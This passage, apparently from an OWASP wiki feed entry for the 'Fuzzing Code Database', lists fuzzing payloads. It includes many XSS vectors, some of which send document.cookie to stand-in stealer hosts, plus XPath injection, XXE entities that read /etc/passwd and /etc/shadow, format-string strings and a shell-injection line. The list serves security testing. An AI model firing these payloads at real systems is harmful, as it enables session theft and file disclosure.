&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80064</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80064"/>
				<updated>2010-03-17T20:41:32Z</updated>
		
